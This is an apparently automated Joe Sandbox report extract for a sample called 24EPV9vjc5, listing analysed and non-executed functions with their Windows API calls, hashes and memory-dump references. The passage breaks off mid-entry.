Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID:
API String ID: 1269201914-0
Opcode ID: 28f200b04ed23ad346880da91cdd7d1151aa1aaa4aa5e9581e377968fef85b4c
Instruction ID: 58669dc73def205fd7f85e7f55af63609c1bed477677e2d8cedf5d22738c1e01
Opcode Fuzzy Hash: 28f200b04ed23ad346880da91cdd7d1151aa1aaa4aa5e9581e377968fef85b4c
Instruction Fuzzy Hash: 76B012922681017F3B4411006CC2CB782CCC5C2F1233081DFB141E0190B8C04C044233

Function 00B714B6 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,00B721A8,?,00000000,?,00000000,?,00B7390C,00000000,?,00000104), ref: 00B714E8

Part of subcall function 00B73BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,00B721CC,000001C7,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73BDB
Part of subcall function 00B73BD3: HeapSize.KERNEL32(00000000,?,00B721CC,000001C7,80004005,8007139F,?,?,00BB0267,8007139F,?,00000000,00000000,8007139F), ref: 00B73BE2

Memory Dump Source

Source File: 00000002.00000002.1635218480.0000000000B71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B70000, based on PE: true

Associated: 00000002.00000002.1635198600.0000000000B70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635267106.0000000000BBB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635297637.0000000000BDA000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1635315447.0000000000BDD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_b70000_24EPV9vjc5.jbxd

Similarity

API ID: Heap$ProcessSizelstrlen
String ID:
API String ID: 3492610842-0
Opcode ID: dd65ec3c3d1004f1912f37a0defb3e8d8bc2188f2c30146e0c1bc2f326e253a4
Instruction ID: c781f4c64bda0555e6e5d3529a0dae60ed0ee2d95d659d700bf81ef6b3a2327b
Opcode Fuzzy Hash: dd65ec3c3d1004f1912f37a0defb3e8d8bc2188f2c30146e0c1bc2f326e253a4
Instruction Fuzzy Hash: D201D633200218ABCF115E5CECC4F9A77E99F94754F11CA95FA3E5B251D671DD009AB0

Non-executed Functions

Function 5BB39384 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 249memoryCOMMON

Download Yara Rule

APIs

GetSaveFileNameW.COMDLG32(?), ref: 5BB39397
memset.MSVCRT ref: 5BB393A9
AllocConvertMultiSZNameToAEx.FONDUE(00000000,00000001), ref: 5BB3943A
free.MSVCRT ref: 5BB395F4
GlobalFree.KERNEL32(00000000), ref: 5BB39607
GlobalFree.KERNEL32(00000000), ref: 5BB39617
GlobalFree.KERNEL32(00000000), ref: 5BB39627
GlobalFree.KERNEL32(00000000), ref: 5BB39637
GlobalFree.KERNEL32(00000000), ref: 5BB39647
GlobalFree.KERNEL32(00000000), ref: 5BB3966A

Strings

L, xrefs: 5BB393B1

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: FreeGlobal$Name$AllocConvertFileMultiSavefreememset
String ID: L
API String ID: 2849690568-2909332022
Opcode ID: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
Instruction ID: 21d808c19f2bf60455c18e43e1fa0dcd5e9bd532f6718678bc66986b2e27de0b
Opcode Fuzzy Hash: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
Instruction Fuzzy Hash: 81B1C7B5A01208EFDB04DF94C484BEDBBB2FB48311F108159E94A9B295D7B5EAC1CF94

Function 5BB383B2 Relevance: 15.1, APIs: 10, Instructions: 85COMMON

Download Yara Rule

APIs

StartDocW.GDI32(?,?), ref: 5BB383C9
SetLastError.KERNEL32(00000008), ref: 5BB383DD
memset.MSVCRT ref: 5BB383EB
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB38413
GlobalFree.KERNEL32(00000000), ref: 5BB38487
GlobalFree.KERNEL32(00000000), ref: 5BB38497
GlobalFree.KERNEL32(00000000), ref: 5BB384A7

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: FreeGlobal$ByteCharErrorFromLastMultiStartWidememset
String ID:
API String ID: 3584426206-0
Opcode ID: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
Instruction ID: 9d7f381b9fc1066624e1d70141abf82ecf9c865936cfe4d8509ca253bbf3e802
Opcode Fuzzy Hash: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
Instruction Fuzzy Hash: B53106B5D00208EFDB40DFA0D888BAEB7B5FB44301F00C659E9156B290D7B5DA84DF96

Function 5BB42384 Relevance: 13.6, APIs: 9, Instructions: 85registrystringCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000008), ref: 5BB423A7
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423B7

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423E3
lstrlenA.KERNEL32(00000000), ref: 5BB42400
RegSetValueA.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 5BB42455
GlobalFree.KERNEL32(00000000), ref: 5BB42468
GlobalFree.KERNEL32(00000000), ref: 5BB42478

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastValuelstrlen
String ID:
API String ID: 2318199773-0
Opcode ID: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
Instruction ID: 62f50d4aa6feed3817b429dc07edf9552c1dc7ce7379a4b05b1e5e0691334358
Opcode Fuzzy Hash: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
Instruction Fuzzy Hash: E43117B1D10219EFCF00DFA4C848BAEBBB2FB08301F008959EA15A3244D3B59694FF95

Function 5BB31BB6 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 176COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 5BB31BCB
newMultiByteFromWideChar.FONDUE(?), ref: 5BB31C8B

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

newMultiByteFromWideChar.FONDUE(?), ref: 5BB31CD6
PrintDlgA.COMDLG32(00000042), ref: 5BB31D0D
GlobalFree.KERNEL32(00000000), ref: 5BB31DA2
GlobalFree.KERNEL32(00000000), ref: 5BB31DD5

Strings

B, xrefs: 5BB31BD3

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharFromMultiWide$FreeGlobal$Printmemset
String ID: B
API String ID: 4070397486-1255198513
Opcode ID: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
Instruction ID: 6afe108593f5a5b3b6ae20c4d97b56e74a9d46c06e0c05ca8afe2fec5f6e2bc5
Opcode Fuzzy Hash: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
Instruction Fuzzy Hash: FF81B978A01209DFDB08DF55D080AAEBBB2FF88350F248159EC499B355D775EA81CB98

Function 5BB38BB5 Relevance: 12.1, APIs: 8, Instructions: 79stringwindowmemoryCOMMON

Download Yara Rule

APIs

_SendMessage@16.FONDUE(?,00000466,?,?), ref: 5BB38BD5
lstrlenW.KERNEL32(00000000), ref: 5BB38BE9
GlobalAlloc.KERNEL32(00000040,?), ref: 5BB38C12
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 5BB38C33
lstrlenA.KERNEL32(00000000), ref: 5BB38C40
_SendMessage@16.FONDUE(?,00000466,?,00000000), ref: 5BB38C5A
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,?), ref: 5BB38C76
GlobalFree.KERNEL32(00000000), ref: 5BB38C83

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharGlobalMessage@16MultiSendWidelstrlen$AllocFree
String ID:
API String ID: 559837489-0
Opcode ID: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
Instruction ID: 49e6a8a00100dc3da80ad0077e4f2cd83a2ab268223cb2c3a0b1d2a1593ad430
Opcode Fuzzy Hash: 7d503c574b1bb77846c3655609ca3e72deaa09b1007aa7541d8f5377833cd8eb
Instruction Fuzzy Hash: 1631ECB5E00209BFDB04DFD8C845FBEB7B9FB48700F108159FA14A7284D6B5AA40DBA5

Function 5BB3BF90 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000008), ref: 5BB3BFB4
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFC4

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFE1
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BFFE
GlobalFree.KERNEL32(00000000), ref: 5BB3C034
GlobalFree.KERNEL32(00000000), ref: 5BB3C044
GlobalFree.KERNEL32(00000000), ref: 5BB3C054

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLast
String ID:
API String ID: 2933462567-0
Opcode ID: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
Instruction ID: cd61925089f64557de00c77e863698e2e42172ca2950e6fbc49bd8f366a6bcce
Opcode Fuzzy Hash: 282f1ecc40d1c3fcd6310e711a16570b67b82778b5815e8426d672c8ba0b0641
Instruction Fuzzy Hash: 4D2125B5D00249EFDB01DFE0C848BAEB7B4FB04305F108569E411A7284D7FA9A84EF95

Function 5BB32B80 Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000008), ref: 5BB32B9D
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB32BAD

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

newMultiByteFromWideCharSize.FONDUE(00000000,?), ref: 5BB32BCC
GetDateFormatA.KERNEL32(00000000,00000000,?,00000000,00000000,?), ref: 5BB32BF7
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,?), ref: 5BB32C1E
GlobalFree.KERNEL32(00000000), ref: 5BB32C2E
GlobalFree.KERNEL32(00000000), ref: 5BB32C3E

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharMultiWide$From$FreeGlobal$DateErrorFormatLastSize
String ID:
API String ID: 4159601105-0
Opcode ID: 08537d5dbb77858840881d1369c1337191a989242bb33f8ddc2fe772082b89eb
Instruction ID: d56b9f61a63688724d7fd1a84db1c3163be83414f68e3df09ecfaac852bac220
Opcode Fuzzy Hash: 08537d5dbb77858840881d1369c1337191a989242bb33f8ddc2fe772082b89eb
Instruction Fuzzy Hash: 2D21F4B1900208EFDF15DF94C889BDEBBB9FB48301F108558E510A7280D7F99A84DFA5

Function 5BB387B8 Relevance: 9.1, APIs: 6, Instructions: 64windowmemorystringCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(?,?), ref: 5BB387CF
lstrlenW.KERNEL32(?), ref: 5BB387F5
GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3880F
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 5BB3882E
LoadIconA.USER32(?,00000000), ref: 5BB38847
GlobalFree.KERNEL32(00000000), ref: 5BB38863

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: GlobalIconLoad$AllocByteCharFreeMultiWidelstrlen
String ID:
API String ID: 1819427946-0
Opcode ID: e4f5fa51340c2dae22360ea363990daaa42bbfcbe0bc9af3485c43681712bef2
Instruction ID: 93b27215f3b7c86335d313cc3d84cc23f256533cc14e065162daa3ccf44e39c8
Opcode Fuzzy Hash: e4f5fa51340c2dae22360ea363990daaa42bbfcbe0bc9af3485c43681712bef2
Instruction Fuzzy Hash: 9D21F9B5A00109BFDB04DF98C944BBEB7B6FB48710F108229F919A7284D6B1DA41DB65

Function 5BB44382 Relevance: 9.1, APIs: 6, Instructions: 63memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000), ref: 5BB44392
GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB443BB
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB443DA
CreateWindowStationA.USER32(?,?,?,?), ref: 5BB443F3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB4440E
GlobalFree.KERNEL32(?), ref: 5BB4441B

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AllocCreateFreeStationWindowlstrlen
String ID:
API String ID: 61863157-0
Opcode ID: 77be3c7843cc1d91420ef63c686bf0ca9697a30c1c42bed64eaf4fb4d6358594
Instruction ID: bd7cb8753f40c03d1de7eeedb3e492252aff23a24105829c0778da8e66c0cc8d
Opcode Fuzzy Hash: 77be3c7843cc1d91420ef63c686bf0ca9697a30c1c42bed64eaf4fb4d6358594
Instruction Fuzzy Hash: C72100B5A00209BFDB00DFD8C845FAFBBB5FB48710F108219FA15A7284D7B19A40DBA5

Function 5BB3BBAA Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000008), ref: 5BB3BBC7
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBD7

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3BBF4
GetProfileIntA.KERNEL32(00000000,00000000,?), ref: 5BB3BC13
GlobalFree.KERNEL32(00000000), ref: 5BB3BC26
GlobalFree.KERNEL32(00000000), ref: 5BB3BC36

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastProfile
String ID:
API String ID: 3090023961-0
Opcode ID: 52afdf9915e8b243ec405ab6aae1891e4d7bd9f2b5e7096e478a0b0e9909bcca
Instruction ID: 0cc18e00ffacb26c8ec14454df6978653983d53d37e2a9a17befb549158f8e60
Opcode Fuzzy Hash: 52afdf9915e8b243ec405ab6aae1891e4d7bd9f2b5e7096e478a0b0e9909bcca
Instruction Fuzzy Hash: D21106B5D00208EFDB21DFA4C448B9EB7B4FB04305F54C069E415AB284DBFA9A84EF55

Function 5BB417A8 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417C7

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB417E4
GlobalFree.KERNEL32(00000000), ref: 5BB4182E
GlobalFree.KERNEL32(00000000), ref: 5BB4183E

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharFromMultiWide$FreeGlobal
String ID:
API String ID: 871221524-0
Opcode ID: a925a881af3f388989389ed37b5183020163956da876000de3ded98ad012239d
Instruction ID: 1ae71789a9cb1ea12a4241843aff322efca2ec314a3b020ee4ddd5cdfee1e37a
Opcode Fuzzy Hash: a925a881af3f388989389ed37b5183020163956da876000de3ded98ad012239d
Instruction Fuzzy Hash: D121B3B6D00208EFCB04DF94D888BDEBBBABB48305F108158E915A7240D7B9DA94DF95

Function 5BB3A79C Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 5BB3A7A6
GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A7C3
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 5BB3A7E2
_hwrite.KERNEL32(?,?,?), ref: 5BB3A7F7
GlobalFree.KERNEL32(?), ref: 5BB3A804

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWide_hwritewcslen
String ID:
API String ID: 762335071-0
Opcode ID: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
Instruction ID: b03e362f488cdfb2104fe771e046c6ed355965b0ed0093c9026cd7edc0c6cb8e
Opcode Fuzzy Hash: 9131b15ab121e49c467aa068c49594242a4f361871abc940b031741a961120e8
Instruction Fuzzy Hash: 7701E1B6A00209BFDB04DFD8C845FAE77B9FB48710F108159FA15A7284D6B1AA40DB65

Function 5BB39FF3 Relevance: 6.1, APIs: 4, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 5BB3A05E

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
Instruction ID: 255683c25f877bb5b72b13642e11f88edc45d41198cb997393b3544e1fd069f6
Opcode Fuzzy Hash: 5431e8108b7e93c7ad38ed47ebdae5d701bb2b3d588510476a1ed689d606d3e9
Instruction Fuzzy Hash: E33160F2900608EFDB00DF94D849BEEB7B4FB48720F204219F514A7280D7B59940CBA9

Function 5BB3E3A8 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000008), ref: 5BB3E3BE
newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB3E3CE

Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242

ObjectCloseAuditAlarmA.ADVAPI32(00000000,?,?), ref: 5BB3E3ED
GlobalFree.KERNEL32(00000000), ref: 5BB3E400

Memory Dump Source

Source File: 00000002.00000002.1636265365.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true

Associated: 00000002.00000002.1636228766.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636286490.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636322460.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636335751.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1636354923.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_5bb30000_24EPV9vjc5.jbxd

Similarity

API ID: ByteCharFromMultiWide$AlarmAuditCloseErrorFreeGlobalLastObject
String ID:
API String ID: 570505851-0
Opcode ID: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
Instruction ID: fca22863d3f99f943faca69b11e91b9c4a69742eecb687ada413b4a94e761a88
Opcode Fuzzy Hash: 4787855c26dc9f58430a23df7370736269a33c3c6954f68eaef49bbfb8a40509
Instruction Fuzzy Hash: AA01ECB6901208EFDB01DFA4C948B9EBBB5FB48301F108159F905A7280D7B69B84EB65

Function 5BB3EBB8 Relevance: 6.0, APIs: 4, Instructions: 32COMMON

Download Yara Rule

APIs

